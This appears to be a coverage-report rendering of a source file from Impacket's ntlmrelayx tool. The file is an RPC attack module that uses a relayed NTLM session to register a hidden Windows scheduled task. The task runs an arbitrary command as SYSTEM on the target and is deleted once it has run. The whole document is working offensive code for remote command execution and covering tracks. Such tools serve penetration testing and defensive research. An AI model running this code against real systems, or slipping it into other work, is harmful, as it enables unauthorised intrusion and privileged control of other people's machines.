Hide keyboard shortcuts

Hot-keys on this page

r m x p   toggle line displays

j k   next/prev highlighted chunk

0   (zero) top of page

1   (one) first highlighted chunk

1# Impacket - Collection of Python classes for working with network protocols. 

2# 

3# SECUREAUTH LABS. Copyright (C) 2020 SecureAuth Corporation. All rights reserved. 

4# 

5# This software is provided under a slightly modified version 

6# of the Apache Software License. See the accompanying LICENSE file 

7# for more information. 

8# 

9# Authors: 

10# Arseniy Sharoglazov <mohemiv@gmail.com> / Positive Technologies (https://www.ptsecurity.com/) 

11# Based on @agsolino and @_dirkjan code 

12# 

13 

14import time 

15import string 

16import random 

17 

18from impacket import LOG 

19from impacket.dcerpc.v5 import tsch 

20from impacket.dcerpc.v5.dtypes import NULL 

21from impacket.examples.ntlmrelayx.attacks import ProtocolAttack 

22 

23PROTOCOL_ATTACK_CLASS = "RPCAttack" 

24 

25class TSCHRPCAttack: 

26 def _xml_escape(self, data): 

27 replace_table = { 

28 "&": "&amp;", 

29 '"': "&quot;", 

30 "'": "&apos;", 

31 ">": "&gt;", 

32 "<": "&lt;", 

33 } 

34 return ''.join(replace_table.get(c, c) for c in data) 

35 

36 def _run(self): 

37 # Here PUT YOUR CODE! 

38 tmpName = ''.join([random.choice(string.ascii_letters) for _ in range(8)]) 

39 

40 cmd = "cmd.exe" 

41 args = "/C %s" % self.config.command 

42 

43 LOG.info('Executing command %s in no output mode via %s' % (self.config.command, self.stringbinding)) 

44 

45 xml = """<?xml version="1.0" encoding="UTF-16"?> 

46<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> 

47 <Triggers> 

48 <CalendarTrigger> 

49 <StartBoundary>2015-07-15T20:35:13.2757294</StartBoundary> 

50 <Enabled>true</Enabled> 

51 <ScheduleByDay> 

52 <DaysInterval>1</DaysInterval> 

53 </ScheduleByDay> 

54 </CalendarTrigger> 

55 </Triggers> 

56 <Principals> 

57 <Principal id="LocalSystem"> 

58 <UserId>S-1-5-18</UserId> 

59 <RunLevel>HighestAvailable</RunLevel> 

60 </Principal> 

61 </Principals> 

62 <Settings> 

63 <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> 

64 <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries> 

65 <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries> 

66 <AllowHardTerminate>true</AllowHardTerminate> 

67 <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> 

68 <IdleSettings> 

69 <StopOnIdleEnd>true</StopOnIdleEnd> 

70 <RestartOnIdle>false</RestartOnIdle> 

71 </IdleSettings> 

72 <AllowStartOnDemand>true</AllowStartOnDemand> 

73 <Enabled>true</Enabled> 

74 <Hidden>true</Hidden> 

75 <RunOnlyIfIdle>false</RunOnlyIfIdle> 

76 <WakeToRun>false</WakeToRun> 

77 <ExecutionTimeLimit>P3D</ExecutionTimeLimit> 

78 <Priority>7</Priority> 

79 </Settings> 

80 <Actions Context="LocalSystem"> 

81 <Exec> 

82 <Command>%s</Command> 

83 <Arguments>%s</Arguments> 

84 </Exec> 

85 </Actions> 

86</Task> 

87 """ % (self._xml_escape(cmd), self._xml_escape(args)) 

88 

89 LOG.info('Creating task \\%s' % tmpName) 

90 tsch.hSchRpcRegisterTask(self.dce, '\\%s' % tmpName, xml, tsch.TASK_CREATE, NULL, tsch.TASK_LOGON_NONE) 

91 

92 LOG.info('Running task \\%s' % tmpName) 

93 done = False 

94 

95 tsch.hSchRpcRun(self.dce, '\\%s' % tmpName) 

96 

97 while not done: 

98 LOG.debug('Calling SchRpcGetLastRunInfo for \\%s' % tmpName) 

99 resp = tsch.hSchRpcGetLastRunInfo(self.dce, '\\%s' % tmpName) 

100 if resp['pLastRuntime']['wYear'] != 0: 

101 done = True 

102 else: 

103 time.sleep(2) 

104 

105 LOG.info('Deleting task \\%s' % tmpName) 

106 tsch.hSchRpcDelete(self.dce, '\\%s' % tmpName) 

107 LOG.info('Completed!') 

108 

109 

110class RPCAttack(ProtocolAttack, TSCHRPCAttack): 

111 PLUGIN_NAMES = ["RPC"] 

112 

113 def __init__(self, config, dce, username): 

114 ProtocolAttack.__init__(self, config, dce, username) 

115 self.dce = dce 

116 self.rpctransport = dce.get_rpc_transport() 

117 self.stringbinding = self.rpctransport.get_stringbinding() 

118 

119 def run(self): 

120 # Here PUT YOUR CODE! 

121 

122 # Assume the endpoint is TSCH 

123 # TODO: support relaying RPC to different endpoints 

124 # TODO: support for providing a shell 

125 # TODO: support for getting an output 

126 if self.config.command is not None: 

127 TSCHRPCAttack._run(self) 

128 else: 

129 LOG.error("No command provided to attack")